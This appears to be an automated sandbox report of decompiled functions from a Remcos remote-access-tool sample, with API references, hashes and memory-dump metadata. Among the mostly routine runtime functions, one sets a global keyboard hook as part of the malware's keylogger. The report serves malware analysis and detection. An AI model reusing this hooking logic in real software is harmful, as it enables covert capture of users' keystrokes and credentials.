							_t41 = _v8;
							 *0x46db88 = _t41;
							 *((intOrPtr*)( *_t41 + 4))();
							E00430269(__eflags, _t41);
							goto L5;
						}
					} else {
						_t41 = _t39;
						goto L5;
					}
				}
			}

0x0040eb01
0x0040eb06
0x0040eb11
0x0040eb22
0x0040eb26
0x0040eb5a
0x0040eb5d
0x0040eb69
0x0040eb28
0x0040eb2a
0x0040eb3e
0x0040eb41
0x0040eb6a
0x0040eb6a
0x0040eb6d
0x0040eb77
0x0040eb7b
0x0040eb80
0x0040eb84
0x0040eb88
0x0040eb8a
0x0040eb8f
0x0040eb99
0x0040eb43
0x0040eb43
0x0040eb48
0x0040eb50
0x0040eb54
0x00000000
0x0040eb59
0x0040eb2c
0x0040eb2c
0x00000000
0x0040eb2c
0x0040eb2a

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040EB01
int.LIBCPMT ref: 0040EB14

Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977

std::locale::_Getfacet.LIBCPMT ref: 0040EB1D
std::_Facet_Register.LIBCPMT ref: 0040EB54
std::_Lockit::~_Lockit.LIBCPMT ref: 0040EB5D
__CxxThrowException@8.LIBVCRUNTIME ref: 0040EB7B
std::exception::exception.LIBCMT ref: 0040EB8A

Strings

Y@, xrefs: 0040EB6A, 0040EB77, 0040EB7A

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
String ID: Y@
API String ID: 2287991272-2491949953
Opcode ID: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
Instruction ID: ff1561f7ec47bfe26f0684d44a3055bc139d2b5ebdf4a0be2619b31cd2ef7e2e
Opcode Fuzzy Hash: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
Instruction Fuzzy Hash: 6411E232A00218ABCB14FBAAE80199EB778DF40764F10057BF90577291EB78AE0187DD

Uniqueness

Uniqueness Score: -1.00%

Function 00408892, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408892(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46baf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E0040887B, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E00417226(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E004075C2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00402084(_t22, _t39 - 0x14, "[ERROR]");
						E00416C80(_t22, 0);
						E00401FC7();
						_t8 = 1;
					}
				}
				return _t8;
			}

0x00408898
0x0040889c
0x004088a1
0x004088a9
0x00000000
0x004088ab
0x004088bb
0x004088c1
0x004088c3
0x004088c5
0x0040890d
0x0040890d
0x00408915
0x0040891b
0x0040891d
0x00000000
0x00000000
0x00408924
0x0040892f
0x00408935
0x00408937
0x00000000
0x00000000
0x00000000
0x00408937
0x00408939
0x00408939
0x004088c7
0x004088d3
0x004088d8
0x004088e3
0x004088f2
0x004088f7
0x00408903
0x0040890a
0x0040890a
0x004088c5
0x00408940

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
SetWindowsHookExA.USER32 ref: 004088BB
GetLastError.KERNEL32 ref: 004088C7

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

GetMessageA.USER32 ref: 00408915
TranslateMessage.USER32(?), ref: 00408924
DispatchMessageA.USER32 ref: 0040892F

Strings

[ERROR], xrefs: 004088ED
Keylogger initialization failure: error , xrefs: 004088DB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $[ERROR]
API String ID: 3219506041-2451335947
Opcode ID: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
Opcode Fuzzy Hash: 8ea95556890b4c9da9a23e7bccd80e685f265dd08c2c7945773fe28fe98e8065
Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00418D28, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418D28(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46bec4 = E00418DDA();
				0x46bec0->cbSize = 0x1fc;
				 *0x46bec8 = 1;
				 *0x46bed0 = 0x401;
				 *0x46bed4 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46bed8, "Remcos", 0x80);
				 *0x46becc = 7;
				Shell_NotifyIconA(0, 0x46bec0);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}

0x00418d41
0x00418d4c
0x00418d5a
0x00418d64
0x00418d6e
0x00418d8d
0x00418d92
0x00418d9e
0x00418da8
0x00418dc4
0x00418dcb
0x00418dd3
0x00000000
0x00000000
0x00418db4
0x00418dbe
0x00418dbe
0x00418dd9

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418D41

Part of subcall function 00418DDA: RegisterClassExA.USER32(00000030), ref: 00418E26
Part of subcall function 00418DDA: CreateWindowExA.USER32 ref: 00418E41
Part of subcall function 00418DDA: GetLastError.KERNEL32 ref: 00418E4B

ExtractIconA.SHELL32(00000000,?,00000000), ref: 00418D78
lstrcpynA.KERNEL32(0046BED8,Remcos,00000080), ref: 00418D92
Shell_NotifyIconA.SHELL32(00000000,0046BEC0), ref: 00418DA8
TranslateMessage.USER32(?), ref: 00418DB4
DispatchMessageA.USER32 ref: 00418DBE
GetMessageA.USER32 ref: 00418DCB

Strings

Remcos, xrefs: 00418D83

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 4432e9a92b08c743a3622aaf1068a32208a60cd4a4d0f65d04395dee408a5685
Instruction ID: 5032fd3989ed38f827dead14ca6996695ce53ed1fe2f9eb900f221369ed5122d
Opcode Fuzzy Hash: 4432e9a92b08c743a3622aaf1068a32208a60cd4a4d0f65d04395dee408a5685
Instruction Fuzzy Hash: 38011EB1500308ABD7109FA1EC0DEDB7BBCFB85706F00406AF611D21A1EBF995858B99

Uniqueness

Uniqueness Score: -1.00%

Function 00446532, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00446532(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0043A4F1();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E0043A504())) = 9;
						L59:
						_t145 = E0043695D();
						goto L60;
					}
					__eflags = _t213 -  *0x46ba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0043F98C(_t224, _t158);
								E004401F5(0);
								E004401F5(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00445A9E(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044E817(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0043A4CE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E0043A504())) = 9;
											 *(E0043A4F1()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0044608E();
												} else {
													_t176 = E0044639E();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0044624E(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E0043A504())) = 0xc;
									 *(E0043A4F1()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E004401F5(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0043A4F1()) =  *_t206 & _t246;
							 *((intOrPtr*)(E0043A504())) = 0x16;
							E0043695D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0043A4F1()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E0043A504())) = 0x16;
					goto L59;
				} else {
					 *(E0043A4F1()) =  *_t212 & 0x00000000;
					_t145 = E0043A504();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x0044653b
0x00446542
0x0044655c
0x0044655e
0x004468c6
0x004468c6
0x004468cb
0x004468cb
0x004468d3
0x004468d9
0x004468d9
0x00000000
0x004468d9
0x00446564
0x0044656a
0x00000000
0x00000000
0x00446572
0x0044657e
0x00446581
0x00446584
0x00446587
0x0044658e
0x00446591
0x00446595
0x00446598
0x0044659b
0x00000000
0x00000000
0x004465a1
0x004465a4
0x004465aa
0x004465c4
0x004465c6
0x004468c2
0x00000000
0x004468c2
0x004465cc
0x004465d0
0x00000000
0x00000000
0x004465d6
0x004465da
0x00000000
0x00000000
0x004465e1
0x004465e5
0x004465e8
0x004465eb
0x004465f0
0x004465f0
0x004465f3
0x00446610
0x00446615
0x00446617
0x00446619
0x00446639
0x0044663a
0x0044663c
0x0044663f
0x00446641
0x00446643
0x00446645
0x00446645
0x00446650
0x00446652
0x00446659
0x0044665e
0x00446661
0x00446664
0x00446666
0x0044668b
0x00446690
0x00446697
0x0044669a
0x0044669d
0x004466a1
0x004466a3
0x004466a7
0x004466a9
0x004466ac
0x004466af
0x004466b1
0x004466b4
0x004466bb
0x004466be
0x004466c3
0x004466c6
0x004466cf
0x004466d3
0x004466d6
0x004466d9
0x004466dc
0x004466e2
0x004466e4
0x004466ed
0x004466f0
0x004466f3
0x004466f6
0x004466f7
0x004466fb
0x00446701
0x0044670b
0x00446710
0x00446720
0x00446724
0x00446727
0x00446729
0x0044672b
0x0044672d
0x0044672f
0x00446737
0x00446738
0x0044673b
0x0044673e
0x0044673f
0x00446745
0x0044674f
0x00446757
0x0044675a
0x00446766
0x0044676a
0x0044676d
0x0044676f
0x00446771
0x00446773
0x00446775
0x0044677d
0x0044677e
0x00446781
0x00446784
0x00446784
0x00446785
0x0044678b
0x00446795
0x00446795
0x00446773
0x0044676f
0x0044675a
0x0044672d
0x00446729
0x00446710
0x004466e4
0x004466dc
0x0044679b
0x004467a1
0x004467a3
0x00446816
0x00446816
0x0044681a
0x0044682a
0x00446830
0x00446832
0x0044688e
0x0044688e
0x00446896
0x00446897
0x00446899
0x004468b2
0x004468b5
0x004467f2
0x004467f3
0x00000000
0x004467f8
0x004468bb
0x00000000
0x004468bb
0x004468a0
0x004468ab
0x00000000
0x004468ab
0x00446834
0x00446837
0x0044683a
0x00000000
0x00000000
0x0044683c
0x0044683c
0x0044683f
0x00446842
0x00446845
0x0044684c
0x00446851
0x00446853
0x00446857
0x00446872
0x00446876
0x00446877
0x0044687a
0x0044687b
0x00446887
0x0044687d
0x0044687d
0x0044687d
0x00446859
0x00446859
0x00446859
0x00446864
0x00446869
0x0044686c
0x0044686c
0x00000000
0x00446851
0x004467a8
0x004467ab
0x004467b2
0x004467b7
0x00000000
0x00000000
0x004467c0
0x004467c6
0x004467c8
0x00000000
0x00000000
0x004467ca
0x004467ce
0x00000000
0x00000000
0x004467e2
0x004467e8
0x004467ea
0x0044680e
0x00446811
0x00000000
0x00446811
0x004467ec
0x00000000
0x00446668
0x0044666d
0x00446678
0x004467f9
0x004467f9
0x004467f9
0x004467fc
0x004467fd
0x00000000
0x00446805
0x00446666
0x0044661b
0x00446620
0x00446627
0x0044662d
0x00000000
0x0044662d
0x004465f5
0x004465f8
0x00446602
0x00446602
0x00446605
0x00446608
0x00000000
0x00446608
0x004465fc
0x004465fe
0x00446600
0x00000000
0x00000000
0x00000000
0x00446600
0x004465ac
0x004465b1
0x004465b9
0x00000000
0x00446544
0x00446549
0x0044654c
0x00446551
0x004468de
0x00000000
0x004468de

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
Opcode Fuzzy Hash: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B

Uniqueness

Uniqueness Score: -1.00%

Function 0044E8D5, Relevance: 13.8, APIs: 9, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044E8D5(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46a00c; // 0xee31ea10
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E004401D9(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E004401D9(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0043F98C(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00450810();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0043F98C(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00450810();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E004420FC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00430BA0(_t130);
													}
												}
											}
										}
									}
								}
								E00430BA0(_t100);
							}
						}
					}
				}
				L63:
				return E0042FD1B(_v8 ^ _t132);
			}

0x0044e8dd
0x0044e8e4
0x0044e8ec
0x0044e8ef
0x0044e8f5
0x0044e8f8
0x0044e8fb
0x0044e8ff
0x0044e902
0x0044e907
0x0044e92e
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e909
0x0044e911
0x0044e913
0x0044e917
0x0044e917
0x0044e91c
0x0044e93a
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e91e
0x0044e927
0x0044e93c
0x0044e93c
0x0044e941
0x0044e948
0x0044e94b
0x0044e94b
0x0044e950
0x0044e95c
0x0044e969
0x0044e976
0x0044e989
0x00000000
0x0044e98b
0x0044e98d
0x0044e9c0
0x00000000
0x0044e9c2
0x0044e9c4
0x0044e9c8
0x0044e9ce
0x0044e9d1
0x0044e9d3
0x0044e9d6
0x0044e9d6
0x0044e9db
0x00000000
0x00000000
0x0044e9dd
0x0044e9e1
0x0044e9eb
0x0044e9f0
0x00000000
0x0044e9f2
0x00000000
0x0044e9f2
0x0044e9f0
0x00000000
0x0044e9e1
0x0044e9d6
0x0044e9d1
0x00000000
0x0044e9c8
0x0044e98f
0x0044e991
0x0044e995
0x0044e99b
0x0044e99e
0x0044e9a0
0x0044e9a0
0x0044e9a5
0x00000000
0x00000000
0x0044e9a7
0x0044e9ab
0x0044e9b5
0x0044e9ba
0x00000000
0x0044e9bc
0x00000000
0x0044e9bc
0x0044e9ba
0x00000000
0x0044e9ab
0x0044e9a0
0x0044e99e
0x00000000
0x0044e995
0x0044e98d
0x0044e978
0x0044e978
0x0044e978
0x00000000
0x0044e978
0x0044e96b
0x0044e96b
0x0044e96d
0x0044e95e
0x0044e95e
0x0044e960
0x0044e960
0x0044e9f7
0x0044e9f7
0x0044e9f7
0x0044ea04
0x0044ea0a
0x0044ea0f
0x0044e930
0x0044ea15
0x0044ea15
0x0044ea1d
0x0044ea21
0x0044ea7c
0x0044ea7e
0x00000000
0x0044ea23
0x0044ea28
0x0044ea2a
0x0044ea2c
0x0044ea34
0x0044ea58
0x0044ea5d
0x0044ea62
0x0044ea68
0x00000000
0x0044ea6e
0x0044ea6e
0x00000000
0x0044ea6e
0x0044ea36
0x0044ea38
0x0044ea3c
0x0044ea41
0x0044ea43
0x0044ea48
0x0044eb5d
0x0044eb5d
0x0044ea4e
0x0044ea4e
0x0044ea74
0x0044ea74
0x0044ea77
0x0044ea81
0x0044ea83
0x00000000
0x0044ea89
0x0044ea91
0x0044ea9f
0x00000000
0x0044eaa5
0x0044eaae
0x0044eab4
0x0044eab9
0x00000000
0x0044eabf
0x0044eabf
0x0044eac2
0x0044eac7
0x0044eacb
0x0044eb17
0x00000000
0x0044eacd
0x0044ead2
0x0044ead4
0x0044ead6
0x0044eade
0x0044eafb
0x0044eb05
0x0044eb07
0x0044eb0a
0x00000000
0x0044eb0c
0x0044eb0c
0x00000000
0x0044eb0c
0x0044eae0
0x0044eae2
0x0044eae6
0x0044eaeb
0x0044eaef
0x0044eb51
0x0044eb51
0x0044eaf1
0x0044eaf1
0x0044eb12
0x0044eb12
0x0044eb19
